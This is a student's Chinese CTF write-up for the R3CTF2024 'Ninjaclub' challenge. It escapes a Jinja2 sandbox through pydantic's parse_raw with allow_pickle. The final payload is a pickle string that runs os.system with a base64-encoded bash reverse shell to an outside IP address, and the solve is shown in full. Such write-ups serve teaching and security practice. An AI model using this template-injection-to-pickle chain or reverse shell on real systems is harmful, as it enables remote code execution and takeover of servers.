R3CTF2024-Ninjaclub-wp-By.Starven

发布于 2024-06-13  84 次阅读

题目描述

image.png

分析

下载附件目录结构如下

image.png

源码如下:

from jinja2.sandbox import SandboxedEnvironment  
from jinja2.exceptions import UndefinedError  
from fastapi import FastAPI, Form  
from fastapi.responses import HTMLResponse  
from pydantic import BaseModel  
from typing_extensions import Annotated  
from typing import Union  
  
app = FastAPI()  
  
class User(BaseModel):  
    name: str  
    description: Union[str, None] = None  
    age: int  
  
  
class Template(BaseModel):  
    source: str  
  
@app.get("/", response_class=HTMLResponse)  
def index():  
    return """xxx前端代码忽略"""  
  
@app.get("/preview", response_class=HTMLResponse)  
def preview_page():  
    return """xxx前端代码忽略"""  
  
    @app.post("/preview", response_class=HTMLResponse)  
def submit_preview(template: Template, user: User):  
    env = SandboxedEnvironment()  
    try:  
        preview = env.from_string(template.source).render(user=user)  
        return preview  
    except UndefinedError as e:  
        return e

本地起服务调试一下:

image.png

传输数据的时候类传入的BaseModel作为默认参数

打断点

image.png
image.png
image.png

这里直接就pickle.load了

payload:

{
"user":{"name":"John","description":"aaa","age":"18"},
"template":{"source":"exp"}
}

exp:

user.parse_raw(b=\"cmd\",allow_pickle=true,content_type='pickle')

cmd:

(S'要执行的命令'\nios\nsystem\n.

最终payload

{"user":{"name":"John","description":"","age":"18"},"template":{"source":"{{user.parse_raw(b=\"(S'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjI1MC4xNDQvODA4MCAwPiYx|base64 -d|bash -i'\nios\nsystem\n.\",allow_pickle=true,content_type=\"Protocol.pickle\")}}"}}
image.png

flag

R3CTF{D0CuM3NTa7lOn_l5_Ur_63st_1RieND_434eaea8aa0a}

大一在读菜鸡ctfer的成长记录